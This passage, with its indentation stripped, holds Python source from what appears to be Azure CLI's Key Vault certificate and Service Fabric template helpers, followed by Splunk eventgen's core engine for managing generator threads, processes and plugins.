not_before = _asn1_to_iso8601(x509.get_notBefore())
if x509.get_notAfter():
not_after = _asn1_to_iso8601(x509.get_notAfter())
cert_attrs = CertificateAttributes(enabled=not disabled,
not_before=not_before,
expires=not_after)
if certificate_policy:
secret_props = certificate_policy.get('secret_properties')
if secret_props:
secret_props['content_type'] = content_type
elif certificate_policy and not secret_props:
certificate_policy['secret_properties'] = SecretProperties(
content_type=content_type)
else:
certificate_policy = CertificatePolicy(
secret_properties=SecretProperties(content_type=content_type))
logger.info("Starting 'keyvault certificate import'")
client_not_arm = _get_keyVault_not_arm_client(cli_ctx)
result = client_not_arm.import_certificate(cli_ctx=cli_ctx,
vault_base_url=vault_base_url,
certificate_name=certificate_name,
base64_encoded_certificate=certificate_data,
certificate_attributes=cert_attrs,
certificate_policy=certificate_policy,
tags=tags,
password=password)
logger.info("Finished 'keyvault certificate import'")
return result
def _download_secret(cli_ctx, vault_base_url, secret_name, pem_path, pfx_path, secret_version=''):
client = _get_keyVault_not_arm_client(cli_ctx)
secret = client.get_secret(vault_base_url, secret_name, secret_version)
secret_value = secret.value
if pem_path:
try:
import base64
decoded = base64.b64decode(secret_value)
p12 = crypto.load_pkcs12(decoded)
f_pem = open(pem_path, 'wb')
f_pem.write(crypto.dump_privatekey(
crypto.FILETYPE_PEM, p12.get_privatekey()))
f_pem.write(crypto.dump_certificate(
crypto.FILETYPE_PEM, p12.get_certificate()))
ca = p12.get_ca_certificates()
if ca is not None:
for cert in ca:
f_pem.write(crypto.dump_certificate(
crypto.FILETYPE_PEM, cert))
f_pem.close()
except Exception as ex: # pylint: disable=broad-except
if os.path.isfile(pem_path):
os.remove(pem_path)
raise ex
if pfx_path:
try:
import base64
decoded = base64.b64decode(secret_value)
p12 = crypto.load_pkcs12(decoded)
with open(pfx_path, 'wb') as f:
f.write(decoded)
except Exception as ex: # pylint: disable=broad-except
if os.path.isfile(pfx_path):
os.remove(pfx_path)
raise ex
def _get_default_policy(cli_ctx, subject):
if subject.lower().startswith('cn') is not True:
subject = "CN={0}".format(subject)
return _default_certificate_profile(cli_ctx, subject)
def _default_certificate_profile(cli_ctx, subject):
CertificateAttributes = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_attributes#CertificateAttributes')
CertificatePolicy = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_policy#CertificatePolicy')
ActionType = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.key_vault_client_enums#ActionType')
KeyUsageType = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.key_vault_client_enums#KeyUsageType')
IssuerParameters = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.issuer_parameters#IssuerParameters')
KeyProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.key_properties#KeyProperties')
LifetimeAction = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.lifetime_action#LifetimeAction')
SecretProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.secret_properties#SecretProperties')
X509CertificateProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.x509_certificate_properties#X509CertificateProperties')
Trigger = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.trigger#Trigger')
Action = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.action#Action')
template = CertificatePolicy(key_properties=KeyProperties(exportable=True,
key_type=u'RSA',
key_size=2048,
reuse_key=True),
secret_properties=SecretProperties(
content_type=u'application/x-pkcs12'),
x509_certificate_properties=X509CertificateProperties(key_usage=[KeyUsageType.c_rl_sign,
KeyUsageType.data_encipherment,
KeyUsageType.digital_signature,
KeyUsageType.key_encipherment,
KeyUsageType.key_agreement,
KeyUsageType.key_cert_sign],
subject=subject,
validity_in_months=12),
lifetime_actions=[LifetimeAction(trigger=Trigger(days_before_expiry=90),
action=Action(action_type=ActionType.auto_renew))],
issuer_parameters=IssuerParameters(
name=u'Self',),
attributes=CertificateAttributes(enabled=True))
return template
def _create_self_signed_key_vault_certificate(cli_ctx, vault_base_url, certificate_name, certificate_policy, certificate_output_folder=None, disabled=False, tags=None, validity=None):
CertificateAttributes = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_attributes#CertificateAttributes')
cert_attrs = CertificateAttributes(enabled=not disabled)
logger.info("Starting long-running operation 'keyvault certificate create'")
if validity is not None:
certificate_policy['x509_certificate_properties']['validity_in_months'] = validity
client = _get_keyVault_not_arm_client(cli_ctx)
client.create_certificate(
vault_base_url, certificate_name, certificate_policy, cert_attrs, tags)
# otherwise loop until the certificate creation is complete
while True:
check = client.get_certificate_operation(
vault_base_url, certificate_name)
if check.status != 'inProgress':
logger.info("Long-running operation 'keyvault certificate create' finished with result %s.",
check)
break
try:
time.sleep(10)
except KeyboardInterrupt:
logger.info("Long-running operation wait cancelled.")
raise
except Exception as client_exception:
message = getattr(client_exception, 'message', client_exception)
import json
try:
message = str(message) + ' ' + json.loads(
client_exception.response.text)['error']['details'][0]['message'] # pylint: disable=no-member
except: # pylint: disable=bare-except
pass
raise CLIError('{}'.format(message))
pem_output_folder = None
if certificate_output_folder is not None:
os.makedirs(certificate_output_folder, exist_ok=True)
pem_output_folder = os.path.join(
certificate_output_folder, certificate_name + '.pem')
pfx_output_folder = os.path.join(
certificate_output_folder, certificate_name + '.pfx')
_download_secret(cli_ctx, vault_base_url, certificate_name,
pem_output_folder, pfx_output_folder)
return client.get_certificate(vault_base_url, certificate_name, ''), pem_output_folder
def _get_keyVault_not_arm_client(cli_ctx):
from azure.cli.core._profile import Profile
version = str(get_api_version(cli_ctx, ResourceType.DATA_KEYVAULT))
def get_token(server, resource, scope): # pylint: disable=unused-argument
return Profile(cli_ctx=cli_ctx).get_login_credentials(resource)[0]._token_retriever() # pylint: disable=protected-access
client = KeyVaultClient(KeyVaultAuthentication(get_token), api_version=version)
return client
def _create_keyvault(cmd,
cli_ctx,
resource_group_name,
vault_name,
location=None,
sku=None,
enabled_for_deployment=True,
enabled_for_disk_encryption=None,
enabled_for_template_deployment=None,
no_self_perms=None, tags=None):
from azure.cli.core._profile import Profile
from azure.graphrbac.models import GraphErrorException
profile = Profile(cli_ctx=cli_ctx)
cred, _, tenant_id = profile.get_login_credentials(
resource=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
graph_client = GraphRbacManagementClient(cred,
tenant_id,
base_url=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
subscription = profile.get_subscription()
VaultCreateOrUpdateParameters = cmd.get_models('VaultCreateOrUpdateParameters', resource_type=ResourceType.MGMT_KEYVAULT)
VaultProperties = cmd.get_models('VaultProperties', resource_type=ResourceType.MGMT_KEYVAULT)
KeyVaultSku = cmd.get_models('Sku', resource_type=ResourceType.MGMT_KEYVAULT)
AccessPolicyEntry = cmd.get_models('AccessPolicyEntry', resource_type=ResourceType.MGMT_KEYVAULT)
Permissions = cmd.get_models('Permissions', resource_type=ResourceType.MGMT_KEYVAULT)
CertificatePermissions = get_sdk(cli_ctx, ResourceType.MGMT_KEYVAULT, 'models#CertificatePermissions')
KeyPermissions = get_sdk(cli_ctx, ResourceType.MGMT_KEYVAULT, 'models#KeyPermissions')
SecretPermissions = get_sdk(cli_ctx, ResourceType.MGMT_KEYVAULT, 'models#SecretPermissions')
KeyVaultSkuName = cmd.get_models('SkuName', resource_type=ResourceType.MGMT_KEYVAULT)
if not sku:
sku = KeyVaultSkuName.standard.value
if no_self_perms:
access_policies = []
else:
permissions = Permissions(keys=[KeyPermissions.get,
KeyPermissions.create,
KeyPermissions.delete,
KeyPermissions.list,
KeyPermissions.update,
KeyPermissions.import_enum,
KeyPermissions.backup,
KeyPermissions.restore],
secrets=[SecretPermissions.get,
SecretPermissions.list,
SecretPermissions.set,
SecretPermissions.delete,
SecretPermissions.backup,
SecretPermissions.restore,
SecretPermissions.recover],
certificates=[CertificatePermissions.get,
CertificatePermissions.list,
CertificatePermissions.delete,
CertificatePermissions.create,
CertificatePermissions.import_enum,
CertificatePermissions.update,
CertificatePermissions.managecontacts,
CertificatePermissions.getissuers,
CertificatePermissions.listissuers,
CertificatePermissions.setissuers,
CertificatePermissions.deleteissuers,
CertificatePermissions.manageissuers,
CertificatePermissions.recover])
try:
object_id = _get_current_user_object_id(graph_client)
except GraphErrorException:
object_id = _get_object_id(graph_client, subscription=subscription)
if not object_id:
raise CLIError('Cannot create vault.\n'
'Unable to query active directory for information '
'about the current user.\n'
'You may try the --no-self-perms flag to create a vault'
' without permissions.')
access_policies = [AccessPolicyEntry(tenant_id=tenant_id,
object_id=object_id,
permissions=permissions)]
properties = VaultProperties(tenant_id=tenant_id,
sku=KeyVaultSku(name=sku),
access_policies=access_policies,
vault_uri=None,
enabled_for_deployment=enabled_for_deployment,
enabled_for_disk_encryption=enabled_for_disk_encryption,
enabled_for_template_deployment=enabled_for_template_deployment)
parameters = VaultCreateOrUpdateParameters(location=location,
tags=tags,
properties=properties)
client = keyvault_client_factory(cli_ctx).vaults
return client.create_or_update(resource_group_name=resource_group_name,
vault_name=vault_name,
parameters=parameters)
# pylint: disable=inconsistent-return-statements
def _get_current_user_object_id(graph_client):
try:
current_user = graph_client.signed_in_user.get()
if current_user and current_user.object_id: # pylint:disable=no-member
return current_user.object_id # pylint:disable=no-member
except CloudError:
pass
def _get_object_id_by_spn(graph_client, spn):
accounts = list(graph_client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(spn)))
if not accounts:
logger.warning("Unable to find user with spn '%s'", spn)
return None
if len(accounts) > 1:
logger.warning("Multiple service principals found with spn '%s'. "
"You can avoid this by specifying object id.", spn)
return None
return accounts[0].object_id
def _get_object_id_by_upn(graph_client, upn):
accounts = list(graph_client.users.list(
filter="userPrincipalName eq '{}'".format(upn)))
if not accounts:
logger.warning("Unable to find user with upn '%s'", upn)
return None
if len(accounts) > 1:
logger.warning("Multiple users principals found with upn '%s'. "
"You can avoid this by specifying object id.", upn)
return None
return accounts[0].object_id
def _get_object_id_from_subscription(graph_client, subscription):
if subscription['user']:
if subscription['user']['type'] == 'user':
return _get_object_id_by_upn(graph_client, subscription['user']['name'])
if subscription['user']['type'] == 'servicePrincipal':
return _get_object_id_by_spn(graph_client, subscription['user']['name'])
logger.warning("Unknown user type '%s'",
subscription['user']['type'])
else:
logger.warning('Current credentials are not from a user or service principal. '
'Azure Key Vault does not work with certificate credentials.')
def _get_object_id(graph_client, subscription=None, spn=None, upn=None):
if spn:
return _get_object_id_by_spn(graph_client, spn)
if upn:
return _get_object_id_by_upn(graph_client, upn)
return _get_object_id_from_subscription(graph_client, subscription)
def _get_template_file_and_parameters_file(linux=None):
script_dir = os.path.dirname(os.path.realpath(__file__))
template_parameter_folder = ""
if linux:
template_parameter_folder = os.path.join('template', 'linux')
else:
template_parameter_folder = os.path.join('template', 'windows')
parameter_file = os.path.join(
script_dir, template_parameter_folder, 'parameter.json')
template_file = os.path.join(
script_dir, template_parameter_folder, 'template.json')
return parameter_file, template_file
def _set_parameters_for_default_template(cluster_location,
cluster_name,
admin_password,
certificate_thumbprint,
vault_id,
certificate_id,
reliability_level,
admin_name,
cluster_size,
durability_level,
vm_sku,
os_type,
linux):
parameter_file, _ = _get_template_file_and_parameters_file(linux)
parameters = get_file_json(parameter_file)['parameters']
if parameters is None:
raise CLIError('Invalid parameters file')
parameters['clusterLocation']['value'] = cluster_location
parameters['clusterName']['value'] = cluster_name
parameters['adminUserName']['value'] = admin_name
parameters['adminPassword']['value'] = admin_password
parameters['certificateThumbprint']['value'] = certificate_thumbprint
parameters['sourceVaultvalue']['value'] = vault_id
parameters['certificateUrlvalue']['value'] = certificate_id
parameters['reliabilityLevel']['value'] = reliability_level
parameters['nt0InstanceCount']['value'] = int(cluster_size)
parameters['durabilityLevel']['value'] = durability_level
parameters['vmSku']['value'] = vm_sku
parameters['vmImageSku']['value'] = os_type
if "Datacenter-Core-1709" in os_type:
parameters['vmImageOffer']['value'] = 'WindowsServerSemiAnnual'
return parameters
def _set_parameters_for_customize_template(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier,
parameter_file):
cli_ctx = cli_ctx
parameters = get_file_json(parameter_file)['parameters']
if parameters is None:
raise CLIError('Invalid parameters file')
if SOURCE_VAULT_VALUE in parameters and CERTIFICATE_THUMBPRINT in parameters and CERTIFICATE_URL_VALUE in parameters:
logger.info('Found primary certificate parameters in parameters file')
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
parameters[SOURCE_VAULT_VALUE]['value'] = result[0]
parameters[CERTIFICATE_URL_VALUE]['value'] = result[1]
parameters[CERTIFICATE_THUMBPRINT]['value'] = result[2]
output_file = result[3]
else:
logger.info('Primary certificate parameters are not present in parameters file')
raise CLIError('The primary certificate parameters names in the parameters file should be specified with' + '\'sourceVaultValue\',\'certificateThumbprint\',\'certificateUrlValue\',' +
'if the secondary certificate parameters are specified in the parameters file, the parameters names should be specified with' + '\'secSourceVaultValue\',\'secCertificateThumbprint\',\'secCertificateUrlValue\'')
if SEC_SOURCE_VAULT_VALUE in parameters and SEC_CERTIFICATE_THUMBPRINT in parameters and SEC_CERTIFICATE_URL_VALUE in parameters:
logger.info('Found secondary certificate parameters in parameters file')
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
parameters[SOURCE_VAULT_VALUE]['value'] = result[0]
parameters[CERTIFICATE_URL_VALUE]['value'] = result[1]
parameters[CERTIFICATE_THUMBPRINT]['value'] = result[2]
else:
if SEC_SOURCE_VAULT_VALUE not in parameters and SEC_CERTIFICATE_THUMBPRINT not in parameters and SEC_CERTIFICATE_URL_VALUE not in parameters:
logger.info(
'Secondary certificate parameters are not present in parameters file')
else:
raise CLIError('The primary certificate parameters names in the parameters file should be specified with' + '\'sourceVaultValue\',\'certificateThumbprint\',\'certificateUrlValue\',' +
'if the secondary certificate parameters are specified in the parameters file, the parameters names should be specified with' + '\'secSourceVaultValue\',\'secCertificateThumbprint\',\'secCertificateUrlValue\'')
return parameters, output_file
def _modify_template(linux):
_, template_file = _get_template_file_and_parameters_file(linux)
template = get_file_json(template_file)
return template
|
eventgen_core.py
|
#!/usr/bin/env python3
# encoding: utf-8
import imp
import logging
import logging.config
import os
import sys
import time
from queue import Empty, Queue
import signal
from threading import Thread, Event
import multiprocessing
from splunk_eventgen.lib.eventgenconfig import Config
from splunk_eventgen.lib.eventgenexceptions import PluginNotLoaded
from splunk_eventgen.lib.eventgentimer import Timer
from splunk_eventgen.lib.outputcounter import OutputCounter
from splunk_eventgen.lib.logging_config import logger
FILE_PATH = os.path.dirname(os.path.realpath(__file__))
EVENTGEN_DIR = os.path.realpath(os.path.join(FILE_PATH, ".."))
EVENTGEN_ENGINE_CONF_PATH = os.path.abspath(os.path.join(FILE_PATH, "default", "eventgen_engine.conf"))
class EventGenerator(object):
def __init__(self, args=None):
'''
This object will allow you to generate and control eventgen. It should be handed the parse_args object
from __main__ and will hand the argument object to the config parser of eventgen5. This will provide the
bridge to using the old code with the newer style. As things get moved from the config parser, this should
start to control all of the configuration items that are global, and the config object should only handle the
localized .conf entries.
:param args: __main__ parse_args() object.
'''
self.stop_request = Event()
self.force_stop = False
self.started = False
self.completed = False
self.config = None
self.args = args
self.workerPool = []
self.manager = None
self._setup_loggers(args=args)
# attach to the logging queue
self.logger.info("Logging Setup Complete.")
self._generator_queue_size = getattr(self.args, 'generator_queue_size', 500)
if self._generator_queue_size < 0:
self._generator_queue_size = 0
self.logger.info("Set generator queue size:{}".format(self._generator_queue_size))
if self.args and 'configfile' in self.args and self.args.configfile:
self._load_config(self.args.configfile, args=args)
def _load_config(self, configfile, **kwargs):
'''
This method will use a configfile and set self.confg as a processeded config object,
kwargs will need to match eventgenconfig.py
:param configfile:
:return:
'''
# TODO: The old eventgen had strange cli args. We should probably update the module args to match this usage.
new_args = {}
if "args" in kwargs:
args = kwargs["args"]
outputer = [key for key in ["keepoutput", "devnull", "modinput"] if getattr(args, key)]
if len(outputer) > 0:
new_args["override_outputter"] = outputer[0]
if getattr(args, "count"):
new_args["override_count"] = args.count
if getattr(args, "interval"):
new_args["override_interval"] = args.interval
if getattr(args, "backfill"):
new_args["override_backfill"] = args.backfill
if getattr(args, "end"):
new_args["override_end"] = args.end
if getattr(args, "multiprocess"):
new_args["threading"] = "process"
if getattr(args, "generators"):
new_args["override_generators"] = args.generators
if getattr(args, "disableOutputQueue"):
new_args["override_outputqueue"] = args.disableOutputQueue
if getattr(args, "profiler"):
new_args["profiler"] = args.profiler
if getattr(args, "sample"):
new_args["sample"] = args.sample
if getattr(args, "verbosity"):
new_args["verbosity"] = args.verbosity
self.config = Config(configfile, **new_args)
self.config.parse()
self.args.multiprocess = True if self.config.threading == "process" else self.args.multiprocess
self._reload_plugins()
if "args" in kwargs and getattr(kwargs["args"], "generators"):
generator_worker_count = kwargs["args"].generators
else:
generator_worker_count = self.config.generatorWorkers
self._setup_pools(generator_worker_count)
def _reload_plugins(self):
# Initialize plugins
# Plugins must be loaded before objects that do work, otherwise threads and processes generated will not have
# the modules loaded in active memory.
try:
self.config.outputPlugins = {}
plugins = self._initializePlugins(
os.path.join(FILE_PATH, 'lib', 'plugins', 'output'), self.config.outputPlugins, 'output')
self.config.validOutputModes.extend(plugins)
self._initializePlugins(
os.path.join(FILE_PATH, 'lib', 'plugins', 'generator'), self.config.plugins, 'generator')
plugins = self._initializePlugins(
os.path.join(FILE_PATH, 'lib', 'plugins', 'rater'), self.config.plugins, 'rater')
self.config._complexSettings['rater'] = plugins
except Exception as e:
self.logger.exception(str(e))
def _load_custom_plugins(self, PluginNotLoadedException):
plugintype = PluginNotLoadedException.type
plugin = PluginNotLoadedException.name
bindir = PluginNotLoadedException.bindir
plugindir = PluginNotLoadedException.plugindir
pluginsdict = self.config.plugins if plugintype in ('generator', 'rater') else self.config.outputPlugins
# APPPERF-263: be picky when loading from an app bindir (only load name)
self._initializePlugins(bindir, pluginsdict, plugintype, name=plugin)
# APPPERF-263: be greedy when scanning plugin dir (eat all the pys)
self._initializePlugins(plugindir, pluginsdict, plugintype)
def _setup_pools(self, generator_worker_count):
'''
This method is an internal method called on init to generate pools needed for processing.
:return:
'''
# Load the things that actually do the work.
self._create_generator_pool()
self._create_timer_threadpool()
self._create_output_threadpool()
self._create_generator_workers(generator_worker_count)
def _create_timer_threadpool(self, threadcount=100):
'''
Timer threadpool is used to contain the timer object for each sample. A timer will stay active
until the end condition is met for the sample. If there is no end condition, the timer will exist forever.
:param threadcount: is how many active timers we want to allow inside of eventgen. Default 100. If someone
has over 100 samples, additional samples won't run until the first ones end.
:return:
'''
self.sampleQueue = Queue(maxsize=0)
num_threads = threadcount
for i in range(num_threads):
worker = Thread(target=self._worker_do_work, args=(
self.sampleQueue,
self.loggingQueue,
), name="TimeThread{0}".format(i))
worker.setDaemon(True)
worker.start()
def _create_output_threadpool(self, threadcount=1):
'''
the output thread pool is used for output plugins that need to control file locking, or only have 1 set thread
to send all the data out of. This FIFO queue just helps make sure there are file collisions or write collisions.
There's only 1 active thread for this queue, if you're ever considering upping this, don't. Just shut off the
outputQueue and let each generator directly output it's data.
:param threadcount: is how many active output threads we want to allow inside of eventgen. Default 1
:return:
'''
# TODO: Make this take the config param and figure out what we want to do with this.
if getattr(self, "manager", None):
self.outputQueue = self.manager.Queue(maxsize=500)
else:
self.outputQueue = Queue(maxsize=500)
num_threads = threadcount
for i in range(num_threads):
worker = Thread(target=self._worker_do_work, args=(
self.outputQueue,
self.loggingQueue,
), name="OutputThread{0}".format(i))
worker.setDaemon(True)
worker.start()
def _create_generator_pool(self, workercount=20):
'''
The generator pool has two main options, it can run in multiprocessing or in threading. We check the argument
from configuration, and then build the appropriate queue type. Each time a timer runs for a sample, if the
timer says it's time to generate, it will create a new generator plugin object, and place it in this queue.
:param workercount: is how many active workers we want to allow inside of eventgen. Default 10. If someone
has over 10 generators working, additional samples won't run until the first ones end.
:return:
'''
if self.args.multiprocess:
self.manager = multiprocessing.Manager()
if self.config and self.config.disableLoggingQueue:
self.loggingQueue = None
else:
# TODO crash caused by logging Thread https://github.com/splunk/eventgen/issues/217
self.loggingQueue = self.manager.Queue()
self.logging_thread = Thread(target=self.logger_thread, args=(self.loggingQueue, ), name="LoggerThread")
self.logging_thread.start()
# since we're now in multiprocess, we need to use better queues.
self.workerQueue = multiprocessing.JoinableQueue(maxsize=self._generator_queue_size)
self.genconfig = self.manager.dict()
self.genconfig["stopping"] = False
else:
self.workerQueue = Queue(maxsize=self._generator_queue_size)
worker_threads = workercount
if hasattr(self.config, 'outputCounter') and self.config.outputCounter:
self.output_counters = []
for i in range(workercount):
self.output_counters.append(OutputCounter())
for i in range(worker_threads):
worker = Thread(target=self._generator_do_work, args=(self.workerQueue, self.loggingQueue,
self.output_counters[i]))
worker.setDaemon(True)
worker.start()
else:
for i in range(worker_threads):
worker = Thread(target=self._generator_do_work, args=(self.workerQueue, self.loggingQueue, None))
worker.setDaemon(True)
worker.start()
def _create_generator_workers(self, workercount=20):
if self.args.multiprocess:
import multiprocessing
self.workerPool = []
for worker in range(workercount):
# builds a list of tuples to use the map function
disable_logging = True if self.args and self.args.disable_logging else False
process = multiprocessing.Process(target=self._proc_worker_do_work, args=(
self.workerQueue,
self.loggingQueue,
self.genconfig,
disable_logging
))
self.workerPool.append(process)
process.start()
self.logger.info("create process: {}".format(process.pid))
else:
pass
def _setup_loggers(self, args=None):
if args and args.disable_logging:
logger.handlers = []
logger.addHandler(logging.NullHandler())
self.logger = logger
self.loggingQueue = None
if args and args.verbosity:
self.logger.setLevel(args.verbosity)
# Set the default log level to ERROR when directly called Generator in tests
if args.verbosity is None:
self.logger.setLevel(logging.ERROR)
def _worker_do_work(self, work_queue, logging_queue):
while not self.stop_request.isSet():
try:
item = work_queue.get(timeout=10)
startTime = time.time()
item.run()
totalTime = time.time() - startTime
if totalTime > self.config.interval and self.config.end != 1:
self.logger.warning("work took longer than current interval, queue/threading throughput limitation")
work_queue.task_done()
except Empty:
pass
except EOFError as ef:
self.logger.exception(str(ef))
continue
except Exception as e:
self.logger.exception(str(e))
raise e
def _generator_do_work(self, work_queue, logging_queue, output_counter=None):
while not self.stop_request.isSet():
try:
item = work_queue.get(timeout=10)
startTime = time.time()
item.run(output_counter=output_counter)
totalTime = time.time() - startTime
if totalTime > self.config.interval and item._sample.end != 1:
self.logger.warning("work took longer than current interval, queue/threading throughput limitation")
work_queue.task_done()
except Empty:
pass
except EOFError as ef:
self.logger.exception(str(ef))
continue
except Exception as e:
if self.force_stop:
break
self.logger.exception(str(e))
raise e
@staticmethod
def _proc_worker_do_work(work_queue, logging_queue, config, disable_logging):
genconfig = config
stopping = genconfig['stopping']
root = logging.getLogger()
root.setLevel(logging.DEBUG)
if logging_queue is not None:
# TODO https://github.com/splunk/eventgen/issues/217
qh = logging.handlers.QueueHandler(logging_queue)
root.addHandler(qh)
else:
if disable_logging:
root.addHandler(logging.NullHandler())
else:
root.addHandler(logging.StreamHandler())
while not stopping:
try:
root.info("Checking for work")
item = work_queue.get(timeout=10)
item.logger = root
item._out.updateConfig(item.config)
item.run()
work_queue.task_done()
item.logger.info("Current Worker Stopping: {0}".format(stopping))
item.logger = None
stopping = genconfig['stopping']
except Empty:
stopping = genconfig['stopping']
except Exception as e:
root.exception(e)
raise e
else:
root.info("Stopping Process")
sys.exit(0)
def logger_thread(self, loggingQueue):
while not self.stop_request.isSet():
try:
record = loggingQueue.get(timeout=10)
logger.handle(record)
loggingQueue.task_done()
except Empty:
pass
except Exception as e:
if self.force_stop:
break
self.logger.exception(str(e))
raise e
def _initializePlugins(self, dirname, plugins, plugintype, name=None):
"""Load a python module dynamically and add to internal dictionary of plugins (only accessed by getPlugin)"""
ret = []
syspathset = set(sys.path)
dirname = os.path.abspath(dirname)
self.logger.debug("looking for plugin(s) in {}".format(dirname))
if not os.path.isdir(dirname):
self.logger.debug("directory {} does not exist ... moving on".format(dirname))
return ret
# Include all plugin directories in sys.path for includes
if dirname not in sys.path:
syspathset.add(dirname)
sys.path = list(syspathset)
# Loop through all files in passed dirname looking for plugins
for filename in os.listdir(dirname):
filename = dirname + os.sep + filename
# If the file exists
if os.path.isfile(filename):
# Split file into a base name plus extension
basename = os.path.basename(filename)
base, extension = os.path.splitext(basename)
# If we're a python file and we don't start with _
# if extension == ".py" and not basename.startswith("_"):
# APPPERF-263: If name param is supplied, only attempt to load
# {name}.py from {app}/bin directory
if extension == ".py" and ((name is None and not basename.startswith("_")) or base == name):
self.logger.debug("Searching for plugin in file '%s'" % filename)
try:
# Import the module
# module = imp.load_source(base, filename)
mod_name, mod_path, mod_desc = imp.find_module(base, [dirname])
# TODO: Probably need to adjust module.load() to be added later so this can be pickled.
module = imp.load_module(base, mod_name, mod_path, mod_desc)
plugin = module.load()
# spec = importlib.util.spec_from_file_location(base, filename)
# plugin = importlib.util.module_from_spec(spec)
# spec.loader.exec_module(plugin)
# set plugin to something like output.file or generator.default
pluginname = plugintype + '.' + base
plugins[pluginname] = plugin
# Return is used to determine valid configs, so only return the base name of the plugin
ret.append(base)
self.logger.debug("Loading module '%s' from '%s'" % (pluginname, basename))
# 12/3/13 If we haven't loaded a plugin right or we haven't initialized all the variables
# in the plugin, we will get an exception and the plan is to not handle it
if 'validSettings' in dir(plugin):
self.config._validSettings.extend(plugin.validSettings)
if 'defaultableSettings' in dir(plugin):
self.config._defaultableSettings.extend(plugin.defaultableSettings)
if 'intSettings' in dir(plugin):
self.config._intSettings.extend(plugin.intSettings)
if 'floatSettings' in dir(plugin):
self.config._floatSettings.extend(plugin.floatSettings)
if 'boolSettings' in dir(plugin):
self.config._boolSettings.extend(plugin.boolSettings)
if 'jsonSettings' in dir(plugin):
self.config._jsonSettings.extend(plugin.jsonSettings)
if 'complexSettings' in dir(plugin):
self.config._complexSettings.update(plugin.complexSettings)
except ValueError:
self.logger.error("Error loading plugin '%s' of type '%s'" % (base, plugintype))
except ImportError as ie:
self.logger.warning("Could not load plugin: %s, skipping" % base)
self.logger.exception(ie)
except Exception as e:
self.logger.exception(str(e))
raise e
return ret
def start(self, join_after_start=True):
self.stop_request.clear()
self.started = True
self.config.stopping = False
self.completed = False
if len(self.config.samples) <= 0:
self.logger.info("No samples found. Exiting.")
for s in self.config.samples:
if s.interval > 0 or s.mode == 'replay' or s.end != "0":
self.logger.info("Creating timer object for sample '%s' in app '%s'" % (s.name, s.app))
# This is where the timer is finally sent to a queue to be processed. Needs to move to this object.
try:
t = Timer(1.0, sample=s, config=self.config, genqueue=self.workerQueue,
outputqueue=self.outputQueue, loggingqueue=self.loggingQueue)
except PluginNotLoaded as pnl:
self._load_custom_plugins(pnl)
t = Timer(1.0, sample=s, config=self.config, genqueue=self.workerQueue,
outputqueue=self.outputQueue, loggingqueue=self.loggingQueue)
except Exception as e:
raise e
self.sampleQueue.put(t)
if join_after_start:
self.logger.info("All timers started, joining queue until it's empty.")
self.join_process()
def join_process(self):
'''
This method will attach the current object to the queues existing for generation and will call stop after all
generation is complete. If the queue never finishes, this will lock the main process to the child indefinitely.
:return:
'''
try:
while not self.sampleQueue.empty() or self.sampleQueue.unfinished_tasks > 0 or not self.workerQueue.empty():
time.sleep(5)
self.logger.info("All timers have finished, signalling workers to exit.")
self.stop()
except Exception as e:
self.logger.exception(str(e))
raise e
def stop(self, force_stop=False):
if hasattr(self.config, "stopping"):
self.config.stopping = True
self.force_stop = force_stop
# set the thread event to stop threads
self.stop_request.set()
# if we're in multiprocess, make sure we don't add more generators after the timers stopped.
if self.args.multiprocess:
if force_stop:
self.kill_processes()
else:
if hasattr(self, "genconfig"):
self.genconfig["stopping"] = True
for worker in self.workerPool:
count = 0
# We wait for a minute until terminating the worker
while worker.exitcode is None and count != 20:
if count == 30:
self.logger.info("Terminating worker {0}".format(worker._name))
worker.terminate()
count = 0
break
self.logger.info("Worker {0} still working, waiting for it to finish.".format(worker._name))
time.sleep(2)
count += 1
self.started = False
# clear the thread event
self.stop_request.clear()
def reload_conf(self, configfile):
'''
This method will allow a user to supply a new .conf file for generation and reload the sample files.
:param configfile:
:return:
'''
self._load_config(configfile=configfile)
self.logger.debug("Config File Loading Complete.")
def check_running(self):
'''
:return: if eventgen is running, return True else False
'''
if hasattr(self, "outputQueue") and hasattr(self, "sampleQueue") and hasattr(self, "workerQueue"):
# If all queues are not empty, eventgen is running.
# If all queues are empty and all tasks are finished, eventgen is not running.
# If all queues are empty and there is an unfinished task, eventgen is running.
if not self.args.multiprocess:
if self.outputQueue.empty() and self.sampleQueue.empty() and self.workerQueue.empty() \
and self.sampleQueue.unfinished_tasks <= 0 \
and self.outputQueue.unfinished_tasks <= 0 \
and self.workerQueue.unfinished_tasks <= 0:
self.logger.info("Queues are all empty and there are no pending tasks")
return self.started
else:
return True
else:
if self.outputQueue.empty() and self.sampleQueue.empty() and self.workerQueue.empty() \
and self.sampleQueue.unfinished_tasks <= 0:
self.logger.info("Queues are all empty and there are no pending tasks")
return self.started
else:
return True
return False
def check_done(self):
'''
:return: if eventgen jobs are finished, return True else False
'''
return self.sampleQueue.empty() and self.sampleQueue.unfinished_tasks <= 0 and self.workerQueue.empty()
def kill_processes(self):
self.logger.info("Kill worker processes")
for worker in self.workerPool:
try:
self.logger.info("Kill worker process: {}".format(worker.pid))
os.kill(int(worker.pid), signal.SIGKILL)
except Exception as e:
